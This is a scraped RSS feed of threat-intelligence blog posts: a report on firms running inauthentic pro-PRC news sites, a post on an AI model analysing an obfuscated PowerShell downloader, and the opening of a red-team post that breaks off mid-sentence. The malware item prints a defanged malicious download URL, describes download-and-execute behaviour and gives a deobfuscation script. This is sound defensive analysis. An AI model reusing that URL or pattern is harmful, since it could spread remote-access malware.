CINXE.COM
Threat Intelligence
<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/</link><description>Threat Intelligence</description><atom:link href="https://cloudblog.withgoogle.com/blog/topics/threat-intelligence/rss/" rel="self"></atom:link><language>en</language><lastBuildDate>Fri, 22 Nov 2024 10:57:56 +0000</lastBuildDate><image><url>https://cloud.google.com/blog/topics/threat-intelligence/static/blog/images/google.a51985becaa6.png</url><title>Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/</link></image><item><title>Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations</title><link>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</link><description><div class="block-paragraph_advanced"><p>Written by: Vanessa Molter</p> <p><span style="font-style: italic; vertical-align: baseline;">Special thanks to Mandiant's Ryan Serabian for his contributions to this analysis.</span></p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This blog post details GLASSBRIDGE—an umbrella group of four different companies that operate networks of inauthentic news sites and newswire services tracked by the Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant). Collectively these firms bulk-create and operate hundreds of domains that pose as independent news websites from dozens of countries, but are in fact publishing thematically similar, inauthentic content that emphasizes narratives aligned to the political interests of the People’s Republic of China (PRC). Since 2022, Google has blocked more than a thousand GLASSBRIDGE-operated websites from eligibility to appear in Google News features and Google Discover because these sites violated our </span><a href="https://support.google.com/news/publisher-center/answer/6204050?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">policies</span></a><span style="vertical-align: baseline;"> that prohibit deceptive behavior and require editorial transparency. </span></p> <p><span style="vertical-align: baseline;">We cannot attribute who hired these services to create the sites and publish content, but assess the firms may be taking directions from a shared customer who has outsourced the distribution of pro-PRC content via imitation news websites.</span></p> <p><span style="vertical-align: baseline;">These campaigns are </span><a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">another example</span></a><span style="vertical-align: baseline;"> of private public relations (PR) firms conducting coordinated influence campaigns—in this case, spreading content aligned with the PRC’s views and political agenda to audiences dispersed across the globe. By using private PR firms, the actors behind the information operations (IO) gain plausible deniability, obscuring their role in the dissemination of coordinated inauthentic content.</span></p> <h2><span style="vertical-align: baseline;">The Basics</span></h2> <p><span style="vertical-align: baseline;">These inauthentic news sites are operated by a small number of stand-alone digital PR firms that offer newswire, syndication and marketing services. They pose as independent outlets that republish articles from PRC state media, press releases, and other content likely commissioned by other PR agency clients. In some cases, they publish localized news content copied from legitimate news outlets. We have also observed content from </span><a href="https://blog.google/threat-analysis-group/google-disrupted-dragonbridge-activity-q1-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DRAGONBRIDGE</span></a><span style="vertical-align: baseline;">, the most prolific IO actor TAG tracks, disseminated in these campaigns. </span></p> <p><span style="vertical-align: baseline;">Although the four PR firms discussed in this post are separate from one another, they operate in a similar fashion, bulk-creating dozens of domains at a time and sharing thematically similar inauthentic content. Based on the set of inauthentic news domain names, the firms target audiences outside the PRC, including Australia, Austria, Czechia, Egypt, France, Germany, Hungary, Kenya, India, Indonesia, Japan, Luxemburg, Macao, Malaysia, New Zealand, Nigeria, Poland, Portugal, Qatar, Russia, Saudi Arabia, Singapore, South Korea, Spain, Switzerland, Taiwan, Thailand, Turkey, the United States, Vietnam, and the Chinese-speaking diaspora.</span></p> <p><span style="vertical-align: baseline;">The use of newswire services is a shared tactic across all campaigns, and two of the PR firms directly control and operate the newswire services.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/glassbridge-fig1a.gif" alt="GLASSBRIDGE is an ecosystem of companies and newswire services that publish inauthentic news content"> </a> <figcaption class="article-image__caption "><p data-block-key="lc3u0">Figure 1: GLASSBRIDGE is an ecosystem of companies and newswire services that publish inauthentic news content</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">The Most Prolific: Shanghai Haixun Technology</span></h2> <p><span style="vertical-align: baseline;">Of the PR and marketing firms we have observed supporting pro-China IO campaigns, the most prolific is Shanghai Haixun Technology Co., Ltd or “Haixun”. Since TAG first began </span><a href="https://blog.google/threat-analysis-group/tag-bulletin-q3-2022/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">tracking</span></a><span style="vertical-align: baseline;"> Haixun, Google has removed more than 600 policy-violating domains linked to the firm from the ability to appear in Google News features. The sites target English- and Chinese-speaking audiences, as well as audiences in a number of countries such as Brazil, India, Japan, Kenya, Korea, Malaysia, Saudi Arabia, Singapore, Spain, Russia, Thailand, Qatar, and Vietnam. Google has also terminated a limited number of policy-violating YouTube channels tied to the group. </span></p> <p><span style="vertical-align: baseline;">In July 2023, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/pro-prc-haienergy-us-news/"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant identified Haixun using both Times Newswire and World Newswire</span></a><span style="vertical-align: baseline;"> to place pro-Beijing content on the subdomains of legitimate news outlets. Mandiant also identified Haixun’s use of freelance services such as Fiverr to recruit </span><span style="vertical-align: baseline;">for-hire social media accounts to promote pro-Beijing content.</span></p> <p><span style="vertical-align: baseline;">Haixun’s inauthentic news sites are generally low quality, and much of the content on the domains is spammy and repetitive. Mixed in with “filler” articles on topics such as the metaverse, the sites publish news content that is politically aligned to the views of the PRC government. This includes articles from the Global Times, a PRC state-controlled media outlet, and narratives aligned to common PRC talking points on Beijing’s territorial claims in the South China Sea, Taiwan, ASEAN, Falun Gong, Xinjiang, and the COVID-19 pandemic.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig2.max-1000x1000.png" alt="Haixun inauthentic news featuring a mix of content, including PRC government talking points, Global Times articles, and content on the metaverse"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 2: Haixun inauthentic news featuring a mix of content, including PRC government talking points, Global Times articles, and content on the metaverse</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Times Newswire and Shenzhen Haimai Yunxiang Media </span></h2> <p><span style="vertical-align: baseline;">In February 2024, we removed policy-violating domains from appearing on Google News surfaces associated with a pro-PRC coordinated influence campaign reported by Citizen Lab as </span><a href="https://citizenlab.ca/2024/02/paperwall-chinese-websites-posing-as-local-news-outlets-with-pro-beijing-content/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PAPERWALL</span></a><span style="vertical-align: baseline;"> that operated a network of over 100 websites in more than 30 countries masquerading as local news outlets. The imitation news sites published localized news content copied from legitimate local news outlets alongside articles republished from PRC state-controlled media, as well as press releases, conspiracy theories, and ad hominem attacks targeting specific individuals. </span></p> <p><span style="vertical-align: baseline;">Based on technical indicators, TAG determined the inauthentic news websites were operated and controlled directly by Times Newswire, one of the news wire services that has distributed content on behalf of Haixun. TAG believes Times Newswire is, in turn, operated by another Chinese media company, Shenzhen Haimai Yunxiang Media Co., Ltd., or “Haimai”, which bills itself as a service provider specialized in global media communication and overseas network promotion. </span></p> <p><span style="vertical-align: baseline;">The views expressed in the conspiracy and smear content were similar to past pro-PRC IO campaigns—for example, character attacks against the Chinese virologist Yan Limeng and claims that the US is conducting biological experiments on humans. Much of the smear content targeting specific individuals was ephemeral—it was posted on imitation news sites for a short period of time and then removed. </span></p> <h2><span style="vertical-align: baseline;">DURINBRIDGE</span></h2> <p><span style="vertical-align: baseline;">Another example of a commercial firm distributing content linked to pro-China IO campaigns is DURINBRIDGE, an alias we use to track a technology and marketing company that has multiple subsidiaries that provide news and PR services. DURINBRIDGE operates a network of over 200 websites designed to look like independent media outlets that publish news content on various topics. These domains violated our policies and have been blocked from appearing on Google News surfaces and Discover.</span></p> <p><span style="vertical-align: baseline;">Importantly, DURINBRIDGE itself is not an IO actor and likely published the IO content on behalf of a customer or partner. Most of the content on the sites is news and press releases from various sources and has no apparent links to coordinated influence campaigns. However, a small portion of the content includes pro-PRC narratives and content directly linked to IO campaigns from Haixun and DRAGONBRIDGE. DURINBRIDGE sites also used articles and images from Times Newswire, which is operated by the aforementioned Chinese PR firm Haimai. </span></p> <p><span style="vertical-align: baseline;">We identified multiple DRAGONBRIDGE articles published to DURINBRIDGE’s news sites. The content included narratives focused on exiled businessman Guo Wengui, a perennial topic for DRAGONBRIDGE, and multiple narratives amplified by DRAGONBRIDGE in the lead up to the Taiwanese presidential election. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig3.max-1000x1000.png" alt="DRAGONBRIDGE content published to inauthentic news sites operated by DURINBRIDGE"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 3: DRAGONBRIDGE content published to inauthentic news sites operated by DURINBRIDGE</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig4.max-1000x1000.png" alt="“Secret History of Tsai Ing-Wen,” on DURINBRIDGE-operated inauthentic news site"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 4: “Secret History of Tsai Ing-Wen,” on DURINBRIDGE-operated inauthentic news site</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig5.max-1000x1000.png" alt="Narratives about then-candidate Lai Ching-te promoted by DRAGONBRIDGE prior to the Taiwanese presidential election"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 5: Narratives about then-candidate Lai Ching-te promoted by DRAGONBRIDGE prior to the Taiwanese presidential election</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Shenzhen Bowen Media</span></h2> <p><span style="vertical-align: baseline;">In early 2024, TAG and Mandiant identified a fourth marketing firm that operates a network of over 100 domains that pose as independent news sites focused on countries and cities across Europe, the Americas, Asia, and Australia. These domains violated our policies and have been blocked from appearing on Google News surfaces and Discover. The operator of the sites, Shenzhen Bowen Media Information Technology Co., Ltd., is a PRC-based marketing firm that also operates World Newswire, the same press release service used by Haixun to place content on the subdomains of legitimate news outlets. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig6.max-1000x1000.png" alt="Sites linked to Shenzhen Bowen with localized content for Brazil and Germany"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 6: Sites linked to Shenzhen Bowen with localized content for Brazil and Germany</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Shenzhen Bowen’s sites present themselves as local outlets focused on a particular country or city, with articles in the local language about business, sports, and politics. The content is in multiple languages, aligned to each target audience, including Chinese, English, French, German, Japanese, and Thai. The sites do not disclose their connection to the marketing firm. </span></p> <p><span style="vertical-align: baseline;">Side-by-side with local content, the sites include narratives promoting the Chinese government’s interests, much of it sourced from World Newswire. In more than one case, TAG and Mandiant have identified content linked to DRAGONBRIDGE published on Shenzhen Bowen-operated sites. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig7.max-1000x1000.png" alt="DRAGONBRIDGE content on “Boston Journal” website linked to Shenzhen Bowen Media"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 7: DRAGONBRIDGE content on “Boston Journal” website linked to Shenzhen Bowen Media</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">The inauthentic news sites operated by GLASSBRIDGE illustrate how information operations actors have embraced methods beyond social media in an attempt to spread their narratives. We have observed similar behavior from </span><a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Russian</span></a><span style="vertical-align: baseline;"> and </span><a href="https://blog.google/threat-analysis-group/tag-bulletin-q3-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Iranian</span></a><span style="vertical-align: baseline;"> IO actors. By posing as independent, and often local news outlets, IO actors are able to tailor their content to specific regional audiences and present their narratives as seemingly legitimate news and editorial content. In fact, the content has been crafted or amplified by PR and newswire firms who conceal their role, or actively misrepresent their content as local and independent news coverage. In the case of GLASSBRIDGE, the consistency in content, behavioral similarities, connections across firms, and pro-PRC messaging suggests the private firms take direction from a shared customer who outsourced the creation of influence campaigns. Google is committed to information transparency, and we will continue tracking GLASSBRIDGE and blocking their inauthentic content on Google’s platforms. We regularly disclose our latest enforcement actions in the </span><a href="https://blog.google/threat-analysis-group/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TAG Bulletin</span></a><span style="vertical-align: baseline;">. </span></p></div></description><pubDate>Fri, 22 Nov 2024 10:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">One of Google Cloud's major missions is to arm security professionals with modern tools to help them defend against the latest threats. Part of that mission involves moving closer to a more autonomous, adaptive approach in threat intelligence automation.</span></span></p> <p><span style="vertical-align: baseline;">In our latest advancements in malware analysis, we’re equipping Gemini with new capabilities to address obfuscation techniques and obtain real-time insights on indicators of compromise (IOCs). By integrating the </span><a href="https://cloud.google.com/vertex-ai/generative-ai/docs/extensions/code-interpreter"><span style="text-decoration: underline; vertical-align: baseline;">Code Interpreter extension</span></a><span style="vertical-align: baseline;">, Gemini can now dynamically create and execute code to help deobfuscate specific strings or code sections, while </span><a href="https://cloud.google.com/security/products/threat-intelligence"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence</span></a><span style="vertical-align: baseline;"> (GTI) </span><a href="https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/function-calling"><span style="text-decoration: underline; vertical-align: baseline;">function calling</span></a><span style="vertical-align: baseline;"> enables it to query GTI for additional context on URLs, IPs, and domains found within malware samples. These tools are a step toward transforming Gemini into a more adaptive agent for malware analysis, enhancing its ability to interpret obfuscated elements and gather contextual information based on the unique characteristics of each sample.</span></p> <p><span style="vertical-align: baseline;">Building on this foundation, we previously explored critical preparatory steps with Gemini 1.5 Pro, leveraging its expansive 2-million-token input window to process substantial sections of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/gemini-for-malware-analysis"><span style="text-decoration: underline; vertical-align: baseline;">decompiled code in a single pass</span></a><span style="vertical-align: baseline;">. To further enhance scalability, we introduced Gemini 1.5 Flash, incorporating </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/scaling-up-malware-analysis-with-gemini"><span style="text-decoration: underline; vertical-align: baseline;">automated binary unpacking</span></a><span style="vertical-align: baseline;"> through Mandiant Backscatter before the decompilation phase to tackle certain obfuscation techniques. Yet, as any seasoned malware analyst knows, the true challenge often begins once the code is exposed. Malware developers frequently employ obfuscation tactics to conceal critical IOCs and underlying logic. Malware may also download additional malicious code, making it challenging to fully understand the behavior of a given sample.</span></p> <p><span style="vertical-align: baseline;">For large language models (LLMs), obfuscation techniques and additional payloads create unique challenges. When dealing with obfuscated strings such as URLs, IPs, domains, or file names, LLMs often “hallucinate” without explicit decoding methods. Additionally, LLMs cannot access, for example, URLs that host additional payloads, often resulting in speculative interpretations about the sample’s behavior.</span></p> <p><span style="vertical-align: baseline;">To help with these challenges, Code Interpreter and GTI function calling tools provide targeted solutions. Code Interpreter enables Gemini to autonomously create and execute custom scripts, as needed, using its own judgment to decode obfuscated elements within a sample, such as strings encoded with XOR-based algorithms. This capability minimizes interpretation errors and enhances Gemini's ability to reveal hidden logic without requiring manual intervention. </span></p> <p><span style="vertical-align: baseline;">Meanwhile, GTI function calling expands Gemini’s reach by retrieving contextualized information from Google Threat Intelligence on suspicious external resources such as URLs, IPs, or domains, providing verified insights without speculative guesses. Together, these tools equip Gemini to better handle obfuscated or externally hosted data, bringing it closer to the goal of functioning as an autonomous agent for malware analysis.</span></p> <p><span style="vertical-align: baseline;">To illustrate how these enhancements boost Gemini's capabilities, let's look at a practical example. In this case, we’re analyzing a PowerShell script that contains an obfuscated URL that hosts a second-stage payload. This particular sample was previously analyzed with some of the most advanced publicly available LLM models, which incorporate code generation and execution as part of their reasoning process. Despite these capabilities, each model “hallucinated,” generating completely fabricated URLs instead of accurately revealing the correct one.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gemini-for-malware3-fig1.max-1000x1000.png" alt="Obfuscated PowerShell code sample to be analyzed by Gemini"> </a> <figcaption class="article-image__caption "><p data-block-key="rb3he">Obfuscated PowerShell code sample to be analyzed by Gemini</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Utilizing Code Interpreter and GTI function calling as part of its reasoning process, Gemini autonomously generated the following report without any human intervention. When deemed necessary, it applies these tools to process and extract additional information from the sample.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <h3><span style="vertical-align: baseline;">Final Report: PowerShell Malware with URL Deobfuscation</span></h3> <p><span style="vertical-align: baseline;">This report analyzes a PowerShell script designed to download and execute a file from an obfuscated URL. The script employs a custom obfuscation routine resembling the RC4 stream cipher to conceal the malicious URL.</span></p> <p><strong style="vertical-align: baseline;">Functionality:</strong></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Obfuscation Routine:</strong><span style="vertical-align: baseline;"> The script defines a function </span><code style="vertical-align: baseline;">F</code><span style="vertical-align: baseline;"> that performs byte-level XOR encryption using a key derived from the string "tox2". This function is used to deobfuscate the malicious URL.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">URL Decryption:</strong><span style="vertical-align: baseline;"> The obfuscated URL, stored as a byte array, is decrypted using the </span><code style="vertical-align: baseline;">F</code><span style="vertical-align: baseline;"> function with "tox2" as the key.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">File Download:</strong><span style="vertical-align: baseline;"> The script downloads a file from the decrypted URL (</span><code style="vertical-align: baseline;">hxxps://filedn[.]eu/lODWTgN8sswHA6Pn8HXWe1J/tox2/Scan_docs%2398097960[.]msi</code><span style="vertical-align: baseline;">) and saves it to the system's temporary directory under a randomly generated filename.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Execution:</strong><span style="vertical-align: baseline;"> Finally, the script executes the downloaded file.</span></p> </li> </ol> <p><strong style="vertical-align: baseline;">Indicators of Compromise (IOCs):</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">URL:</strong><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">hxxps://filedn[.]eu/lODWTgN8sswHA6Pn8HXWe1J/tox2/Scan_docs%2398097960[.]msi</code></p> </li> </ul> <p><strong style="vertical-align: baseline;">Deobfuscation Code:</strong></p> <pre class="language-plain"><code>def deobfuscate(x, y): s = list(range(256)) j = 0 k = [ord(c) for c in y] for i in range(256): j = (j + s[i] + k[i % len(k)]) % 256 s[i], s[j] = s[j], s[i] i = 0 j = 0 output = [] for m in range(len(x)): i = (i + 1) % 256 j = (j + s[i]) % 256 s[i], s[j] = s[j], s[i] output.append(x[m] ^ s[(s[i] + s[j]) % 256]) return output a = [0x25, 0x7B, 0x5A, 0xD8, 0x9C, 0xFF, 0xC3, 0xA4, 0x95, 0xB7, 0x9D, 0x6E, 0x5F, 0x4D, 0x49, 0xFB, 0x78, 0x32, 0xB8, 0x17, 0x72, 0x01, 0x31, 0xFB, 0xC0, 0x58, 0x45, 0xCB, 0x5C, 0x3C, 0xDD, 0x00, 0x60, 0x87, 0x25, 0xB2, 0x44, 0xA6, 0xC5, 0xEA, 0x71, 0xAA, 0x9D, 0xA1, 0x05, 0x5F, 0xBD, 0x41, 0x28, 0x70, 0x30, 0x6B, 0x96, 0x24, 0x92, 0xA0, 0x9D, 0x92, 0x23, 0x79, 0x69, 0x2C, 0x1B, 0x1E, 0xEB, 0x69, 0x8F, 0x04, 0x10, 0x74, 0xBC] b = "tox2" c = deobfuscate(a, b) decoded_url = "".join(chr(i) for i in c) print(decoded_url)</code></pre> <p><strong style="vertical-align: baseline;">Google Threat Intelligence (GTI) Lookup:</strong></p> <p><span style="vertical-align: baseline;">The GTI lookup provides valuable context regarding the identified IOC:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Threat Actor:</strong><span style="vertical-align: baseline;"> UNC5687, known for using MESHAGENT in phishing campaigns impersonating the Security Service of Ukraine.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Campaign:</strong><span style="vertical-align: baseline;"> This specific URL is linked to a campaign spreading MESHAGENT via phishing emails with malicious links. The campaign involved a captcha page leading to the download of either a malicious MSI or EXE file.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Malware:</strong><span style="vertical-align: baseline;"> The campaign delivers MESHAGENT, an open-source remote access framework, configured to communicate with C2 domains linked to a service called "AnonVNC."</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Conclusion:</strong></p> <p><span style="vertical-align: baseline;">The analyzed PowerShell script is confirmed to be malicious, associated with a phishing campaign by UNC5687 distributing the MESHAGENT remote access tool.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Gemini identified that the script employs an XOR-based obfuscation algorithm that resembles RC4 to conceal the download URL. Recognizing this pattern, Gemini autonomously generates and executes a Python deobfuscation script within the Code Interpreter sandbox, successfully revealing the external resource.</span></p> <p><span style="vertical-align: baseline;">With the URL in hand, Gemini then utilizes GTI function calling to query Google Threat Intelligence for further context. This analysis links the URL to UNC5687, a threat cluster known for using a remote access tool in phishing campaigns impersonating the Security Service of Ukraine.</span></p> <p><span style="vertical-align: baseline;">As we’ve seen, the integration of these tools has strengthened Gemini’s ability to function as a malware analyst capable of adapting its approach to address obfuscation and gathering vital context on IOCs. By incorporating the Code Interpreter and GTI function calling, Gemini is better equipped to navigate complex samples by autonomously interpreting hidden elements and contextualizing external references.</span></p> <p><span style="vertical-align: baseline;">While these are significant advancements, many challenges remain, especially given the vast diversity of malware and scenarios that exist in the threat landscape. We’re committed to making steady progress, and future updates will continue to enhance Gemini's capabilities, moving us closer to a more autonomous, adaptive approach in threat intelligence automation.</span></p></div></description><pubDate>Tue, 19 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bernardo Quintero</name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Andrés Ramírez</name><title></title><department></department><company></company></author></item><item><title>Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation</title><link>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Written by: Matthijs Gielen, Jay Christiansen</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Background</span></h2> <p><span style="vertical-align: baseline;">New solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us—the attackers and defenders—and our battle to improve security through all the noise?</span></p> <p><span style="vertical-align: baseline;">Data is everywhere. For most organizations, the access to security data is no longer the primary issue. Rather, it is the vast quantities of it, the noise in it, and the disjointed and spread-out nature of it. Understanding and making sense of it—THAT is the real challenge.</span></p> <p><span style="vertical-align: baseline;">When we conduct adversarial emulation (<a href="https://cloud.google.com/security/consulting/mandiant-red-team">red team</a>) engagements, making sense of all the network, user, and domain data available to us is how we find the path forward. From a defensive perspective, efficiently finding the sharpest and most dangerous needles in the haystack—for example, easily accessible credentials on fileshares—is how we prioritize, improve, and defend.</span></p> <p><span style="vertical-align: baseline;">How do you make sense of this vast amount of structured and unstructured data, and give yourself the advantage?</span></p> <p><span style="vertical-align: baseline;">Data permeates the modern organization. This data can be challenging to parse, process, and understand from a security implication perspective, but AI might just change all that.</span></p> <p><span style="vertical-align: baseline;">This blog post will focus on a number of case studies where we obtained data during our complex adversarial emulation engagements with our global clients, and how we innovated using AI and LLM systems to process this into structured data that could be used to better defend organizations. We will showcase the lessons learned and key takeaways for all organizations and highlight other problems that can be solved with this approach for both red and blue teams.</span></p> <h2><span style="vertical-align: baseline;">Approach</span></h2> <p><span style="vertical-align: baseline;">Data parsing and understanding is one of the biggest early benefits of AI. We have seen many situations where AI can help process data at a fast rate. Throughout this post, we use an LLM to process unstructured data, meaning that the data did not have a structure or format that we knew about before parsing the data.</span></p> <p><span style="vertical-align: baseline;">If you want to try these examples out yourself, please make sure you use either a local model, or you have permission to send the data to an external service.</span></p> <h3><span style="vertical-align: baseline;">Getting Structured Data Out of an LLM</span></h3> <p><span style="vertical-align: baseline;">Step one is to get the data into a format we can use. If you ever used an LLM, you will have noticed it will output as a story or prose text, especially if you use chat-based versions. For a lot of use cases, this is fine; however, we want to analyze the 